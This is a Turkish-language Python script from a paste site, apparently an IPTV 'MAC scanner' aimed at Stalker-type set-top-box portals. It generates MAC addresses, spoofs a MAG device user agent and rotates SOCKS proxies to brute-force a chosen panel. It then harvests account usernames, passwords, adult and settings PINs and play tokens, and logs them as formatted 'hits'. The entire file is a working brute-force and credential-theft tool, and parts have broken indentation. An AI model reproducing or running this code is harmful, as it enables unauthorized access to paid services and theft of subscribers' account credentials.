Beyaz-Mavi@Feyzo.py

decoded code
mail@pastecode.io avatar
unknown
python
2 years ago
33 kB
96
Indexable
Never
import os,pip
import datetime,os
import socket,hashlib
import json,random,sys, time,re
import androidhelper as sl4a
import subprocess
import pathlib
subprocess.run(["clear", ""])
try:
	import requests
except:
	print("requests modulu yüklü değil \n requests modulü yükleniyor \n")
	pip.main(['install', 'requests'])
import requests
try:
	import sock
except:
	print("sock modulu yüklü değil \n sock modulü yükleniyor \n")
	pip.main(['install', 'requests[socks]'] )
	pip.main(['install', 'sock'] )
	pip.main(['install', 'socks'] )
	pip.main(['install', 'PySocks'] )
import sock

subprocess.run(["clear", ""])
ad = sl4a.Android()
oto=0
tur=0
Seri=""
csay=0

import logging
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS="TLS13-CHACHA20-POLY1305-SHA256:TLS13-AES-128-GCM-SHA256:TLS13-AES-256-GCM-SHA384:ECDHE:!COMP"
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
ses= requests.Session()
logging.captureWarnings(True)

say=0
yanpanel="hata" 
imzayan="" 
bul=0
hit=0
prox=0
cpm=1


macSayisi=999999999999991# 1#deneme sayisı
feyzo=("""
\33[32m▰▰▰▰ᴘʏᴛʜᴏɴ 🅑🅛🅤🅔-🅦🅗🅘🅣🅔 -ᴘʏ ᴄᴏɴғɪɢ▰▰▰▰    \33[33m         
╔══════════════════════════════════    
║████ ████ ██ ░░ ██ ██████ ░ ████ ░░░     
║██ ░░ ██ ░░ ██ ██ ░░░░ ██ ░██ ░██ ░░    
║████ ████ ░ ████ ░░░ ██ ░ ██ ░░░██ ░   
║██ ░░ ██ ░░░░ ██ ░░ ██ ░░░░ ██ ░██ ░░   
║██ ░░ ████ ░░ ██ ░░ ██████ ░ ████ ░░░    
╚══════════════════════════════════          
\33[32m▰▰▰▰ 🅑🅛🅤🅔-🅦🅗🅘🅣🅔 ᴘʏ ᴄᴏɴғɪɢ ▰▰▰▰       \33[0m""")
print(feyzo) 
pattern= "(00:\w{2}:79:\w{2}:\w{2}:\w{2})"
ozelmac=""
#################
nick='@FeyzullahK'
nick=input("""
Lütfen telegram adresinizi veya Adınızı yazın.

Şekilli kullanıcı adınıza yazabilirdiniz.
Exp=https://t.me/feyzullahK
Exp=🅵🅴🆈🆉🅾️

	Nick=""")
subprocess.run(["clear", ""])
print(feyzo) 
panel = input("""
Örnek PanelAdı:Port = iptvturkiye.xyz:8080\n
	\33[1mʟüᴛғᴇɴ ᴘᴀɴᴇʟ ᴀᴅıɴı ʏᴀᴢıɴıᴢ.. ? \n\n
Panel:Port=\33[0m\33[31m\33[1m""")

uzmanmodu="kapalı"
if panel=="1":
  subprocess.run(["clear", ""]) 
  print(feyzo)
  uzmanmodu="açık"
  print("Uzman Modu açıldı, hata verdiğinde exit demeyecektir") 
  panel = input("""
Örnek PanelAdı:Port = iptvturkiye.xyz:8080\n
	\33[1mʟüᴛғᴇɴ ᴘᴀɴᴇʟ ᴀᴅıɴı ʏᴀᴢıɴıᴢ.. ? \n\n
Panel:Port=\33[0m\33[31m\33[1m""")

kanalkata="0"
kanalkata=input("""
Kanal Kategorileri imzaya dahil edilsin mi?
	0= Ekleme
	1= Sadece Ulke Kanal kategorisi
	2= Hepsini ekle (Live-VOD SERI)
\33[1mCevab Girin=""")subprocess.run(["clear", ""])
print(feyzo) 

combo=input("""
	Tarama türünü seçiniz..!
1= Combolu
2 = Otomatik Combosuz

 Cevap=""" )
subprocess.run(["clear", ""])
print(feyzo) 
totLen="000000"
if combo=="1":
 	say=0
 	dsy=""
 	dir='/sdcard/combo/'
 	for files in os.listdir (dir):
 		say=say+1
 		dsy=dsy+"	"+str(say)+"-) "+files+'\n'
 	print ("""Aşağıdaki listeden combonuzu seçin!!!
"""+dsy+"""
\33[33mCombo klasörünüzde """ +str(say)+""" adet dosya bulundu !
	""")
 	dsyno=str(input(" \33[31mCombo No =\33[0m"))
 	say=0
 	for files in os.listdir (dir):
 			say=say+1
 			if dsyno==str(say):
 				dosyaa=(dir+files)
 	say=0
 	print(dosyaa) 
 	c=open(dosyaa, 'r')
 	
 	totLen=c.readlines()
 	subprocess.run(["clear", ""])
 	print(feyzo) 
 	print("Combonuzdaki mac yetersiz kaldığında taramaya devam edebilmesi için")
macturu=input("""
\33[1mMac kombinasyonu türünü seçin...?\33[0m
\33[33mArdışık artan mac için = \33[31m1
\33[33mRandom rasgele için  = \33[31m2

\33[0m\33[1mMac Kombinasyon Türü=\33[31m""")
if macturu=="":
	macturu="2"
#################
#print("\nTaranacak Panel:Port=\33[1m\33[31m" + panel +"\33[0m\n") 
#D4:CF:F9
#MacCombo="33:44:CF:4"
MacCombo="00:1A:79:"
#MacCombo="10:27:be:"

Macs = input("\33[0m\nSeri Mac Kullanılsın mı? \nCevap \33[1m\33[34mEvet (1) \33[0m yada \33[1m\33[32mHayır (2) \33[0m Yazınız!! =") 
if Macs=="5":
	macSayisi=1#int(input("Denecek mac sayısı =")) 
	ozelmac=input("Özel çalışan mac =")
dmac=""
if Macs=="0":
	dmac=input("""
Default Mac Türü
	1= 00:1A:79:
	2= 10:27:BE:
	3= 33:44:CF
	4= Kendim Beliryeceğim...
	""")
	if dmac=="1":
		MacCombo="00:1A:79:"
		Macs = input("\33[0m\nSeri Mac Kullanılsın mı? \nCevap \33[1m\33[34mEvet (1) \33[0m yada \33[1m\33[32mHayır (2) \33[0m Yazınız!! =") 

	if dmac=="2":
		MacCombo="10:27:BE:"
		Macs = input("\33[0m\nSeri Mac Kullanılsın mı? \nCevap \33[1m\33[34mEvet (1) \33[0m yada \33[1m\33[32mHayır (2) \33[0m Yazınız!! =") 

	if dmac=="3":
		MacCombo="33:44:CF:"
		Macs = input("\33[0m\nSeri Mac Kullanılsın mı? \nCevap \33[1m\33[34mEvet (1) \33[0m yada \33[1m\33[32mHayır (2) \33[0m Yazınız!! =") 

	if dmac=="4":
		MacCombo=input("İlk üç maç türünü yazınız...")
		Macs = input("\33[0m\nSeri Mac Kullanılsın mı? \nCevap \33[1m\33[34mEvet (1) \33[0m yada \33[1m\33[32mHayır (2) \33[0m Yazınız!! =") 


if Macs[:1]=="e" or Macs[:1]=="E" or Macs=="1":
  Seri=input("Örnek="+MacCombo+"\33[31m5\33[0m\nÖrnek="+MacCombo+"\33[31mFa\33[32m\nBir yada iki değer Yazınız!!!\33[0m\n\33[1m"+MacCombo+"\33[31m")
  Seri=Seri[:2]
  MacCombo=MacCombo+Seri[:2]
#################
#MacCombo=MacCombo
subprocess.run(["clear", ""])
print(feyzo) 
#print(len(feyzo)) 
mm=MacCombo.replace(':',"")
if panel=="" :
  exit() 
if len(mm)==6:
	turet=6
	MacCombo=MacCombo+":"
if len(mm)==7:
	turet=5
if len(mm)==8:
	turet=4
	MacCombo=MacCombo+":"
Rhit='\33[33m' 
Ehit='\033[0m' 
panel=panel.replace("http://","")
panel=panel.replace("/c","")
panel=panel.replace("/","")
tkn1="a"
tkn2="a"
tkn3="a"
tkn4="a"
tkn5="a"
pro1="a"
pro2="a"
pro3="a"
trh1="a"
trh2="a"
trh3="a"
adult=""
play_token=""
acount_id=""
stb_id=""
stb_type=""
sespas=""
stb_c=""
timezon=""
tloca=""
    
subprocess.run(["clear", ""])
print(feyzo) 
acount_id="bbb"
a="0123456789ABCDEF"
s=-1
ss=0
sss=0
ssss=0
sd=0
sdd=0
bad=0
proxies=""
proxi=input("""
	Proxies kullanmak istiyormusunuz..!
1 - Evet
2 - Hayır
1 veya 2 yazınız =""")
subprocess.run(["clear", ""])
print(feyzo) 
if proxi =="1":
	say=0
	dsy=""
	dir='/sdcard/download/'
	for files in os.listdir (dir):
		if files.endswith(".txt"):
			say=say+1
			dsy=dsy+"	"+str(say)+"-) "+files+'\n'
	print ("""
	Aşağıdaki listeden combonuzu seçin!!!
"""+dsy+"""
\33[33mCombo klasörünüzde """ +str(say)+""" adet dosya bulundu !
Lütfen Proxy Socks5 dosyanızı seçininiz...!
	""")
	dsyno=str(input(" \33[31mCombo No =\33[0m"))
	say=0
	for files in os.listdir (dir):
		if files.endswith(".txt"):
			say=say+1
			if dsyno==str(say):
				dosyaa=(dir+files)
	say=0
	proxies=""
	print(dosyaa) 
	Proxy=dosyaa
	c=open(Proxy,'r')
	sock=c.readlines()
	prox=0
	Proxy=dosyaa
	subprocess.run(["clear", ""])
	print(feyzo) 
	pro=input("""
Seçtiğiniz dosyadaki proxsy türü nedir?
	1 - ipVanish Socks5
	2 - free Socks4 
	3 - free Socks5
		Proxy türü=""")
subprocess.run(["clear", ""])
print(feyzo) 
DosyaA="/sdcard/" + panel.replace(":","_") +"@Feyzo.txt"
def yaz(hits):
  dosya=open(DosyaA,'a+') 
  dosya.write(hits)
  dosya.close()
subprocess.run(["clear", ""]) 
print(feyzo) 
for mag in range(0,macSayisi):
	oto=""
	macr=""
	tur=0
	if turet==5:
		nokta=1
	else:
		nokta=2
	for i in range(turet):
		if tur ==nokta:
			oto=oto+":"
			tur=0
			nokta=2
		oto=oto+random.choice('ABCDEF0123456789')
		tur = tur +1
		macr=oto
	s=s+1
	if s ==16:
		ss=ss+1
		s=0
	if ss ==16:
		sss=sss+1
		ss=0
		s=0
	if sss==16:
		ssss=ssss+1
		sss=0
		ss=0
		s=0
	if ssss==16:
		sd=sd+1
		ssss=0
		sss=0
		ss=0
		s=0		
	if sd==16:
		sdd=sdd+1
		sd=0
		sss=0
		ss=0
		s=0

	if sdd==16:
		sdd=0
		sd=0
		sss=0
		ss=0
		s=0
	
	seri1=a[sdd]
	seri2=a[sd]
	if not Seri=="":
		if len(Seri)==1:
			seri1=""#Seri[0]
			
		if len(Seri)==2:
			seri1=""#Seri[0]
			seri2=""#Seri[1]
	maca=(seri1+seri2+":"+a[ssss]+a[sss]+":"+a[ss]+a[s])
	if macturu =="1":
		mac=maca
	else:
		mac=macr
	mac=MacCombo+mac
		
		
	
	mac=mac.replace("::",":")
	mac=mac.replace(" ","")
	macs=mac.replace(':','%3A')
	combo=combo
	if combo=="1":
		#print(combo)
		if len(totLen)-2 > csay:
			#print(combo)
			while True:
			  # print(csay)
			   csay=csay+1
			   if csay > len(totLen)-1 :
			   	#print("######")
			   	break
			   macv =re.search(pattern,totLen[csay],re.IGNORECASE)
			   if macv:
			   	mac=macv.group()
			   	if not dmac=="":
			   		mac=mac.replace('00:1A:79',MacCombo)
			   	break
	if not ozelmac=="":
		mac=ozelmac
	macs=mac.replace(':','%3A')	   

		
	HEADERA={
"User-Agent":"Mozilla/5.0 (QtEmbedded; U; Linux; C; Windows NT 10.0; Win64; x64; rv:74.0) AppleWebKit/533.3 Gecko/20100101 Firefox/74.0 MAG200 stbapp ver: 2 rev: 250 Mobile Safari/533.3" ,
"Referer": "http://"+panel+"/c/" ,
"Accept": "application/json,application/javascript,text/javascript,text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" ,
"Cookie": "mac="+macs+"; stb_lang=en; timezone=Asia%2Shanghai" ,
"Accept-Encoding": "gzip, deflate" ,
"Connection": "Keep-Alive" ,
	}	
	url1="http://"+panel+"/server/load.php?type=stb&action=handshake&prehash=false&JsHttpRequest=1-xml" 
	token=""
	veri=""
	
	
	if proxi =="1":
			if prox==len(sock)-2:
				prox=0
			#print("evet")
			if pro=="1":
					#print("1")
					while True:
						try:
							if prox==len(sock)-2:
								prox=0
							prox=prox+1
							#print(prox)
							pveri=(sock[prox])
							pveri=pveri.replace('\n','')
							pip=pveri.split(':')[0]
							pport=pveri.split(':')[1]
							pname=pveri.split(':')[2]
							ppass=pveri.split(':')[3]
							proxies={'http':'socks5://'+pname+':'+ppass+'@'+pip+':'+pport,
							'https':'socks5://'+pname+':'+ppass+'@'+pip+':'+pport}
							print('\33[33mSocks5 Total:'+str(len(sock)-1)+' Run: ' + str(prox)+' Bad:' +str(bad)+"\33[0m" )
							res = ses.get(url1,proxies =proxies, headers=HEADERA, timeout=15, verify=False)
							veri=str(res.text)
							#print(str(req.text)+"-----" + str(prox))
							break
						except :
							bad=bad+1
							pass
			if pro=="2":
					#print("2")
					while True:
						try:
							if prox==len(sock)-2:
								prox=0
							prox=prox+1
							pveri=(sock[prox])
							pveri=pveri.replace('\n','')
							#print(pveri)
							pip=pveri.split(':')[0]#""
							pport=pveri.split(':')[1]#""
							proxies={'http':'socks4://'+pip+':'+pport,
						'https':'socks4://'+pip+':'+pport}
							print('Socks4 Total:'+str(len(sock)-1)+' Run: ' + str(prox)+' Bad:' +str(bad))
							res = ses.get(url1,proxies =proxies, headers=HEADERA, timeout=15, verify=False)
							veri=str(res.text)
							#print(str(re.text)+"-----" + str(prox))
							break
						except :
							bad=bad+1
							pass
	
			if pro=="3":
					#print("2")
					while True:
						try:
							if prox==len(sock)-2:
								prox=0
							prox=prox+1
							pveri=(sock[prox])
							pveri=pveri.replace('\n','')
							#print(pveri)
							pip=pveri.split(':')[0]#""
							pport=pveri.split(':')[1]#""
							proxies={'http':'socks5://'+pip+':'+pport,
						'https':'socks5://'+pip+':'+pport}
							print('Socks5 Total:'+str(len(sock)-1)+' Run: ' + str(prox)+' Bad:' +str(bad))
							res = ses.get(url1,proxies =proxies, headers=HEADERA, timeout=15, verify=False)
							veri=str(res.text)
							#print(str(re.text)+"-----" + str(prox))
							break
						except :
							bad=bad+1
							pass
		
	
	

	
#	try:
	else:
		bag1=0
		while True:
			try:
				res = ses.get(url1,proxies =proxies, headers=HEADERA, timeout=15, verify=False)
				veri=str(res.text)
				break
			except:
				bag1=bag1+1
				time.sleep(2)
				if bag1==4:
					quit()
		bag1=0
					
		veri=str(res.text)
		
	if 1==1:
      renk="\33[0m"
      if 'token' in veri:
      	token=veri.replace('{"js":{"token":"',"")
      	token=token.replace('"}}',"")
      	renk="\33[0m"
      else:
      	renk="\33[41m"
      
      say=say+1
      #print(token)
      total=str(say) 
      cpm=(time.time()-cpm)
      cpm=(round(60/cpm))
      print ("\33[0m\33[96m🅑-🅦 - 🅟🅨 Total ➤"+total+"  \33[31m Hit ➤" + str(hit)+ "  \33[94m Cpm ➤" +str(cpm)+"   \n " +renk+mac+" \33[32m" +panel)
      
      cpm=time.time()
      
      
      HEADERd={
"User-Agent":"Mozilla/5.0 (QtEmbedded; U; Linux; C; Windows NT 10.0; Win64; x64; rv:74.0) AppleWebKit/533.3 Gecko/20100101 Firefox/74.0 MAG200 stbapp ver: 2 rev: 250 Mobile Safari/533.3" ,
"Referer": "http://"+panel+"/c/" ,
"Accept": "application/json,application/javascript,text/javascript,text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" ,
"Cookie": "mac="+macs+"; stb_lang=en; timezone=Asia%2Shanghai" ,
"Accept-Encoding": "gzip, deflate" ,
"Connection": "Keep-Alive" ,
"Authorization": "Bearer "+token,
      }
      
     
      url2="http://"+panel+"/server/load.php?type=stb&action=get_profile&JsHttpRequest=1-xml" 
      while True:
      	try:
      		res = ses.get(url2,proxies =proxies, headers=HEADERd, timeout=15, verify=False)
      		break
      	except:
      		bag1=bag1+1
      		time.sleep(2)
      		if bag1==4:
      			quit()
      bag1=0
      		
      	
      veri=""
      veri=str(res.text)
      #print(veri)
      ip=""
      if 'play_token' in veri:
      	adult=veri.split('parent_password":"')[1]
      	adult=adult.split('"')[0]
      	play_token=veri.split('play_token":"')[1]
      	play_token=play_token.split('"')[0]
      	acount_id=veri.split('name":"')[1]
      	acount_id=acount_id.split('"')[0]
      	stb_id=veri.split('id":"')[1]
      	stb_id=stb_id.split('"')[0]
      	stb_type=veri.split('"stb_type":"')[1]
      	stb_type=stb_type.split('"')[0]
      	sespas=veri.split('"settings_password":"')[1]
      	sespas=sespas.split('"')[0]
      	stb_c=veri.split('"client_type":"')[1]
      	stb_c=stb_c.split('"')[0]
      	timezon=veri.split('"default_timezone":"')[1]
      	timezon=timezon.split('"')[0]
      	tloca=veri.split('"default_locale":"')[1]
      	tloca=tloca.split('"')[0]
      	if 'ip' in veri:
      		try:
      			ip=veri.split('ip":"')[1]
      			ip=ip.split('"')[0]
      		except:pass
      
      bag1=0
      url3="http://"+panel+"/server/load.php?type=account_info&action=get_main_info&JsHttpRequest=1-xml" 
      while True:
      	try:
      		res = ses.get(url3, proxies =proxies, headers=HEADERd, timeout=15, verify=False)
      		break
      	except:
      		bag1=bag1+1
      		time.sleep(2)
      		if bag1==4:
      			quit()
      
      bag1=0
      veri=""
      veri=str(res.text)
      if not veri=="":
      	if not 'js' in veri:
      		url3="http://"+panel+"/server/load.php?type=account_info&action=get_main_info&JsHttpRequest=1-xml&mac="+macs
      		while True:
      			try:
      				res = ses.get(url3, proxies =proxies, headers=HEADERd, timeout=15, verify=False)
      				break
      			except:
	      			bag1=bag1+1
	      			time.sleep(2)
	      			if bag1==4:
	      			 	quit()
	      	bag1=0
      		veri=str(res.text)
      
      if not veri.count('phone')==0:#feyzo=="{" :
      	hit=hit+1
      	
      	sound="/sdcard/kemik_sesi.mp3"
      	file = pathlib.Path(sound) 
      	if file.exists ():
      		ad.mediaPlay(sound)

      	trh=veri.split('phone":"')[1]
      	trh=trh.replace('"}}',"")
      	#print(trh)
      	SN=(hashlib.md5(mac.encode('utf-8')).hexdigest())
      	SNENC=SN.upper()
      	SNCUT=SNENC[:13]
      	DEV=hashlib.sha256(mac.encode('utf-8')).hexdigest()
      	DEVENC=DEV.upper()
      	SG=SNCUT+'+'+(mac)
      	SING=(hashlib.sha256(SG.encode('utf-8')).hexdigest())
      	SINGENC=SING.upper()
      	url5="http://"+panel+"/server/load.php?type=itv&action=get_genres&JsHttpRequest=1-xml"
      	kategori="hata"
      	if kanalkata=="1" or kanalkata=="2" :
      		while True:
      			try:
      				res = ses.get(url5, proxies =proxies, headers=HEADERd, timeout=15, verify=False)
      				break
      			except:
      				bag1=bag1+1
      				time.sleep(2)
      				if bag1==4:
      					quit()
      		bag1=0
      			
      		veri=str(res.text)
	      	if veri.count('title":"')>1:
	      		for i in veri.split('title":"'):
	      			kanal= (i.split('","')[0])
	      			kategori=kategori+kanal+" 💫 "
	      			#⚡️✨💫
	      		if '*' in kategori:
	      			kategori=kategori.split("*")[1]
	      		kategori=kategori.replace("\/","/")
	      		kategori=kategori.replace('hata{"js":[{"id":"','')
      		
      	#print(kategori)
      	url5="http://"+panel+"/server/load.php?type=vod&action=get_categories&JsHttpRequest=1-xml"
      	kategoriv="hata"
      	if kanalkata=="2" :
      		while True:
      			try:
      				res = ses.get(url5, proxies =proxies, headers=HEADERd, timeout=15, verify=False)
      				break
      			except:
      				bag1=bag1+1
      				time.sleep(2)
      				if bag1==4:
      					quit()
      		bag1=0
      			
      		veri=str(res.text)
	      	if veri.count('title":"')>1:
	      		for i in veri.split('title":"'):
	      			kanal= (i.split('","')[0])
	      			kategoriv=kategoriv+kanal+" ✨ "
	      			#⚡️✨💫
	      		if '*' in kategoriv:
	      			kategoriv=kategoriv.split("*")[1]
	      		kategoriv=kategoriv.replace("\/","/")
	      		kategoriv=kategoriv.replace('hata{"js":[{"id":"','')
      	#print(kategori)
      	url5="http://"+panel+"/server/load.php?type=series&action=get_categories&JsHttpRequest=1-xml"
      	kategoris="hata"
      	if kanalkata=="2" :
      		while True:
      			try:
      				res = ses.get(url5, proxies =proxies, headers=HEADERd, timeout=15, verify=False)
      				break
      			except:
      				bag1=bag1+1
      				time.sleep(2)
      				if bag1==4:
      					quit()
      		bag1=0
      			
      		veri=str(res.text)
	      	if veri.count('title":"')>1:
	      		for i in veri.split('title":"'):
	      			kanal= (i.split('","')[0])
	      			kategoris=kategoris+kanal+" ⚡️ "
	      			#⚡️✨💫
	      		if '*' in kategoris:
	      			kategoris=kategoris.split("*")[1]
	      		kategoris=kategoris.replace('\/','')
	      		kategoris=kategoris.replace('hata{"js":[{"id":"','')
	      		
      		
      	#print(kategori)      	
      	url5="http://"+panel+"/server/load.php?action=get_ordered_list&type=series&p=1&JsHttpRequest=1-xml"
      	token2="play_token" 
      	while True:
      		try:
      			res = ses.get(url5, proxies =proxies, headers=HEADERd, timeout=15, verify=False)
      			break
      		except:
      			bag1=bag1+1
      			time.sleep(2)
      			if bag1==4:
      				break
      	bag1=0
      	veri=str(res.text)
      	if 'cmd' in veri:
      		token2=veri.split('cmd":"')[1]
      		token2=token2.split('"')[0]
      	#print(token2)
      	real=panel
      	HEADERd={
"Host":panel,      	
"User-Agent":"Mozilla/5.0 (QtEmbedded; U; Linux; C; Windows NT 10.0; Win64; x64; rv:74.0) AppleWebKit/533.3 Gecko/20100101 Firefox/74.0 MAG200 stbapp ver: 2 rev: 250 Mobile Safari/533.3" ,
"X-User-Agent": "Model: MAG254; Link: Ethernet,WiFi" ,
"Referer": "http://"+panel+"/c/" ,
"Accept": "application/json,application/javascript,text/javascript,text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" ,
"Accept-Language": "en-US,*",
"Accept-Charset": "UTF-8,*;q=0.8",
"Cookie": "mac="+macs+"; stb_lang=en; timezone=Europe%2FParis; adid=b01850af81da130f1f4407a96da5b48c" ,
"Accept-Encoding": "gzip, deflate" ,
"Connection": "Keep-Alive" ,
"Authorization": "Bearer "+token,
      }
      	url5="http://"+real+"/server/load.php?type=itv&action=create_link&cmd=ffmpeg%20http://localhost/ch/1823_&series=&forced_storage=0&disable_ad=0&download=0&force_ch_link_check=0&JsHttpRequest=1-xml" 
      	userm="hata"
      	pasdm=""
      	while True:
      		try:
      			res = ses.get(url5, proxies =proxies, headers=HEADERd, timeout=15, verify=False)
      			break
      		except:
      			bag1=bag1+1
      			time.sleep(2)
      			if bag1==4:
      				break
      	bag1=0
      	veri=str(res.text)
      	veri=veri.replace('live\/', '') 
      	real=veri.split('\/')[2]
      	userm=veri.split('\/')[3]
      	pasdm=veri.split(userm+'\/')[1]
      	pasdm=pasdm.split('\/')[0]
      	#print(userm)
      	HEADERd={
"User-Agent":"Mozilla/5.0 (QtEmbedded; U; Linux; C; Windows NT 10.0; Win64; x64; rv:74.0) AppleWebKit/533.3 Gecko/20100101 Firefox/74.0 MAG200 stbapp ver: 2 rev: 250 Mobile Safari/533.3" ,
"Referer": "http://"+panel+"/c/" ,
"Accept": "application/json,application/javascript,text/javascript,text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" ,
"Accept-Encoding": "gzip, deflate" ,
"Connection": "Keep-Alive" ,
"Authorization": "Bearer "+token,
      }
      	if userm=="hata":
      			url5="http://"+real+"/server/load.php?action=create_link&type=vod&cmd="+token2+"&JsHttpRequest=1-xml"
      			while True:
      				try:
      					res = ses.get(url5, proxies =proxies, headers=HEADERd, timeout=15, verify=False)
      					break
      				except:
      					bag1=bag1+1
      					time.sleep(2)
      					if bag1==4:
      						break
      			bag1=0
      			real=veri.split('\/')[2]
      			userm=veri.split('\/')[4]
      			pasdm=veri.split('\/')[5]
      			
      	realm=real
      	url5="http://"+panel+"/player_api.php?username="+userm+"&password="+pasdm+"&action=get_live_streams"
      	while True:
      		try:
      			res = ses.get(url5, proxies =proxies, headers=HEADERd, timeout=15, verify=False)
      			break
      		except:
      			bag1=bag1+1
      			time.sleep(2)
      			if bag1==4:
      			 	break
      	bag1=0
      	veri=str(res.text)
      	kanalsayisi=str(veri.count("stream_id"))
      	#print(kanalsayisi)
      	url5="http://"+panel+"/player_api.php?username="+userm+"&password="+pasdm+"&action=get_vod_streams"
      	while True:
      		try:
      			res = ses.get(url5, proxies =proxies, headers=HEADERd, timeout=15, verify=False)
      			break
      		except:
      			bag1=bag1+1
      			time.sleep(2)
      			if bag1==4:
      			 	break
      	bag1=0
      	veri=str(res.text)
      	filmsayisi=str(veri.count("stream_id"))
      	
      	url5="http://"+panel+"/player_api.php?username="+userm+"&password="+pasdm+"&action=get_series"
      	while True:
      		try:
      			res = ses.get(url5, proxies =proxies, headers=HEADERd, timeout=15, verify=False)
      			break
      		except:
      			bag1=bag1+1
      			time.sleep(2)
      			if bag1==4:
      			 	break
      	bag1=0
      	veri=str(res.text)
      	dizisayisi=str(veri.count("series_id"))
      	
      	url5="http://"+panel+"/player_api.php?username="+userm+"&password="+pasdm
      	while True:
      		try:
      			res = ses.get(url5, proxies =proxies, headers=HEADERd, timeout=15, verify=False)
      			break
      		except:
      			bag1=bag1+1
      			time.sleep(2)
      			if bag1==4:
      			 	break
      	bag1=0
      	veri=str(res.text)
      	acon="" 
      	if 'active_cons' in veri:
      		try:
		      	#print(veri)
		      	acon=""
		      	acon=veri.split('active_cons":')[1]
		      	acon=acon.split(',')[0]
		      	acon=acon.replace('"',"")
		      	
		      	mcon=veri.split('max_connections":')[1]
		      	mcon=mcon.split(',')[0]
		      	mcon=mcon.replace('"',"")
		      	
		      	status=veri.split('status":')[1]
		      	status=status.split(',')[0]
		      	status=status.replace('"',"")
		      	
		      	timezone=veri.split('timezone":"')[1]
		      	timezone=timezone.split('",')[0]
		      	timezone=timezone.replace("\/","/")
		      	
		      	realm=veri.split('url":')[1]
		      	realm=realm.split(',')[0]
		      	realm=realm.replace('"',"")
		      	#print(realm)
		      	portal=panel
		      	port=veri.split('port":')[1]
		      	port=port.split(',')[0]
		      	port=port.replace('"',"")
		      	
		      	user=veri.split('username":')[1]
		      	user=user.split(',')[0]
		      	user=user.replace('"',"")
		      	
		      	passw=veri.split('password":')[1]
		      	passw=passw.split(',')[0]
		      	passw=passw.replace('"',"")
		      	
		      	bitis=veri.split('exp_date":')[1]
		      	bitis=bitis.split(',')[0]
		      	bitis=bitis.replace('"',"")
		      	if bitis=="null":
		      		bitis="Unlimited"
		      	else:
		      		bitis=(datetime.datetime.fromtimestamp(int(bitis)).strftime('%Y-%m-%d %H:%M:%S'))
		      	bitis=bitis
      		except:pass
      	try:
      		pal=panel.split(':')[0]
      		yanpanel1="hata" 
	      	yanpanel="hata" 
	      	url= "http://ipv4info.com/?act=check&ip="+pal
	      	res = ses.get(url, timeout=15, verify=False)
	      	veri=str(res.text)
	      	yan=""
	      	yanlar=veri
	      	yanpanel="hata"
	      	if veri.count("Site info ")>0:
	      	  for i in veri.split('Site info ('):
	      	  	yan=yan+(i.split(')')[0])+" 🌎 "
	      	  	yanpanel=(yan.split('(')[1])
	      	else:
			  		    yan1=veri.split('href="/ip-address')[1]
			  		    yan1=yan1.split('">')[0]
			  		    url="http://ipv4info.com/ip-address"+yan1
			  		    res = ses.get(url, timeout=15, verify=False)
			  		    veri=str(res.text)
			  		    if veri.count("Site info ")>0:
			  		       for i in veri.split('Site info ('):
			  		       yan=yan+(i.split(')')[0])+" 🌎 "
			  		       yanpanel=(yan.split('(')[1])
			  		
			  	#else:
	      	if not realm==panel:
	      		pal=realm.split(':')[0]
	      		url= "http://ipv4info.com/?act=check&ip="+pal
	      		res = ses.get(url, timeout=15, verify=False)
	      		veri=str(res.text)
	      		yan=""
	      		yanpanel1="hata"
	      		if veri.count("Site info ")>0:
	      		  for i in veri.split('Site info ('):
	      		  	if yanpanel.count(i.split(')')[0])==0:
	      		  		yan=yan+(i.split(')')[0])+" 🌎 "
	      		  		yanpanel1=(yan.split('(')[1])
	      		else:
	      			yan1=veri.split('href="/ip-address')[1]
	      			yan1=yan1.split('">')[0]
	      			url="http://ipv4info.com/ip-address"+yan1
	      			res = ses.get(url, timeout=15, verify=False)
	      			veri=str(res.text)
	      			if veri.count("Site info ")>0:
			  		     for i in veri.split('Site info ('):
			  		     	 if yanpanel.count(i.split(')')[0])==0:
			  		     	  	yan=yan+(i.split(')')[0])+" 🌎 "
			  		     	  	yanpanel1=(yan.split('(')[1])
			  		
	      	if not yanpanel1=="hata" :
	      		yanpanel=yanpanel+yanpanel1
	      	yanpanel=yanpanel.replace(" 🌎 🌎 "," 🌎 ")
      	except:pass
      		
      	
      	mlink="http://"+ panel + "/get.php?username=" + userm + "&password=" + pasdm + "&type=m3u_plus"
      	imzaa=""
      	imzab=""
      	imzak=""
      	imza1=("""
╔╣ ᴘʏᴛʜᴏɴ ᴍᴏʙɪʟᴅᴇɴ ᴛᴀʀᴀᴍᴀ ╠╗
╠●🌐Panel➤http://"""+panel+"""/c/
╠●🌍Real ➤http://"""+real+"""
╠●💎Mac➤ """+mac+"""
╠●📆Exp.➤ """+trh+"""
╠══╣ @FeyzullahK╠═""")
      	if not adult =="":
      		imzaa=("""
╠●👤Acn.Id ➤"""+acount_id+"""
╠●👤Stb Id ➤"""+stb_id+"""
╠●📺StbTipi➤"""+stb_type+"""
╠●🎦ClientTipi➤"""+stb_c+"""
╠●🔞A.Pass➤"""+adult+"""
╠●⚙️S.Pass➤"""+sespas+"""
╠●🎲PlayToken➤"""+play_token+"""
╠●🌍Ip➤"""+ip+"""
╠●🕛TimeZone➤"""+timezon.replace('\/','/')+"""
╠●🌏Local➤"""+tloca+"""
╠╣🅑🅛🅤🅔-🅦🅗🅘🅣🅔╠═""")
	  #except:pass
      	imza2=""
      	if not acon=="":
      		imza2=("""
╠●🌐 Host ➤ http://"""+portal+"""
╠●🌍 Real ➤ http://"""+realm+"""
╠●📡 Port ➤ """+port+"""
╠●👩‍ User ➤ """+user+"""
╠●🔑 Pass ➤ """+passw+"""
╠●📆 Exp. ➤ """+bitis+""" 
╠●👩 Act Con ➤ """+acon+"""
╠●👪 Max Con ➤ """+mcon+""" 
╠●🌐 Status ➤ """+status+"""
╠●⏰ TimeZone➤ """+timezone+"""
╠══╣"""+nick+"""
╠●🎬 Kanal Sayısı➤"""+kanalsayisi+"""
╠●🎬 Film Sayısı➤"""+filmsayisi+"""
╠●🎬 Dizi Sayısı➤"""+dizisayisi+"""
╠═╣ """+nick+""" ╠""")
      	imzasif=("""
╠●🔑 Serial ➤"""+SNENC+""" 
╠●🔑 SerialСut➤"""+SNCUT+"""
╠●🔑 DeviceID➤"""+DEVENC+"""
